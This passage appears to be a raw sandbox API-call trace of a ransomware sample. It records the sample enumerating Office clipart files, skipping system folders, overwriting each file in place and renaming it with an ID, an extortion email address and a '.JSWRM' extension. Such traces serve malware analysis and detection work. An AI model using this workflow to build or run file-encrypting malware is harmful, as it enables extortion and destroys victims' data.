dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0097.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0097.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0097.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0097.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0097.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0097.173] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0097.173] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01566_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01566_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01566_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01566_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0097.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0097.178] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0097.178] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103ac532, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x54b0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01568_.WMF", cAlternateFileName="")) returned 1 [0097.178] lstrcmpiW (lpString1="SO01568_.WMF", lpString2=".") returned 1 [0097.178] lstrcmpiW (lpString1="SO01568_.WMF", lpString2="..") returned 1 [0097.178] lstrcmpiW (lpString1="SO01568_.WMF", lpString2="...") returned 1 [0097.178] lstrcmpiW (lpString1="SO01568_.WMF", lpString2="windows") returned -1 [0097.178] lstrcmpiW (lpString1="SO01568_.WMF", lpString2="recovery") returned 1 [0097.178] lstrcmpiW (lpString1="SO01568_.WMF", lpString2="perflogs") returned 1 [0097.178] lstrcmpiW (lpString1="SO01568_.WMF", lpString2="documents and settings") returned 1 [0097.178] lstrcmpiW (lpString1="SO01568_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.178] lstrcmpiW (lpString1="SO01568_.WMF", lpString2="system volume information") returned -1 [0097.178] lstrcmpiW (lpString1="SO01568_.WMF", lpString2="msocache") returned 1 [0097.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0097.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01568_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01568_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01568_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0097.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0097.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01568_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01568_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01568_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0097.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0097.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0097.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.179] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0097.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01568_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01568_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.180] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21680) returned 1 [0097.180] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x54b0) returned 0x24d210 [0097.180] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x54b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x54b0, lpOverlapped=0x0) returned 1 [0097.183] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.183] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x54b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x54b0, lpOverlapped=0x0) returned 1 [0097.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.183] CloseHandle (hObject=0x314) returned 1 [0097.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0097.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0097.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0097.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0097.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0097.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0097.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.183] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01568_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01568_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01568_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01568_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0097.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0097.184] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0097.184] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103ac532, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103ac532, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47a0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01569_.WMF", cAlternateFileName="")) returned 1 [0097.184] lstrcmpiW (lpString1="SO01569_.WMF", lpString2=".") returned 1 [0097.184] lstrcmpiW (lpString1="SO01569_.WMF", lpString2="..") returned 1 [0097.184] lstrcmpiW (lpString1="SO01569_.WMF", lpString2="...") returned 1 [0097.184] lstrcmpiW (lpString1="SO01569_.WMF", lpString2="windows") returned -1 [0097.184] lstrcmpiW (lpString1="SO01569_.WMF", lpString2="recovery") returned 1 [0097.184] lstrcmpiW (lpString1="SO01569_.WMF", lpString2="perflogs") returned 1 [0097.185] lstrcmpiW (lpString1="SO01569_.WMF", lpString2="documents and settings") returned 1 [0097.185] lstrcmpiW (lpString1="SO01569_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.185] lstrcmpiW (lpString1="SO01569_.WMF", lpString2="system volume information") returned -1 [0097.185] lstrcmpiW (lpString1="SO01569_.WMF", lpString2="msocache") returned 1 [0097.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0097.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01569_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01569_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01569_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0097.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0097.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01569_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01569_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01569_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0097.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0097.185] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0097.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.185] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0097.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01569_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01569_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.185] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18336) returned 1 [0097.185] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x47a0) returned 0x24d210 [0097.186] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x47a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x47a0, lpOverlapped=0x0) returned 1 [0097.188] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.188] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x47a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x47a0, lpOverlapped=0x0) returned 1 [0097.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.188] CloseHandle (hObject=0x314) returned 1 [0097.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0097.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0097.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0097.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0097.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0097.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0097.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.189] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01569_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01569_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01569_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01569_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0097.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0097.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0097.190] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103f89f0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103f89f0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103f89f0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa8a6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO01575_.WMF", cAlternateFileName="")) returned 1 [0097.190] lstrcmpiW (lpString1="SO01575_.WMF", lpString2=".") returned 1 [0097.190] lstrcmpiW (lpString1="SO01575_.WMF", lpString2="..") returned 1 [0097.190] lstrcmpiW (lpString1="SO01575_.WMF", lpString2="...") returned 1 [0097.190] lstrcmpiW (lpString1="SO01575_.WMF", lpString2="windows") returned -1 [0097.190] lstrcmpiW (lpString1="SO01575_.WMF", lpString2="recovery") returned 1 [0097.190] lstrcmpiW (lpString1="SO01575_.WMF", lpString2="perflogs") returned 1 [0097.190] lstrcmpiW (lpString1="SO01575_.WMF", lpString2="documents and settings") returned 1 [0097.190] lstrcmpiW (lpString1="SO01575_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.190] lstrcmpiW (lpString1="SO01575_.WMF", lpString2="system volume information") returned -1 [0097.190] lstrcmpiW (lpString1="SO01575_.WMF", lpString2="msocache") returned 1 [0097.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0097.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01575_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01575_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01575_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0097.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0097.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01575_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO01575_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO01575_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0097.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0097.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0097.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0097.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01575_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01575_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.192] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=43174) returned 1 [0097.192] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa8a0) returned 0x24d210 [0097.192] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa8a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa8a0, lpOverlapped=0x0) returned 1 [0097.196] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.196] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa8a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa8a0, lpOverlapped=0x0) returned 1 [0097.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0097.197] CloseHandle (hObject=0x314) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0097.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0097.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0097.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0097.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0097.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0097.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.197] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01575_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01575_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO01575_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so01575_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0097.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 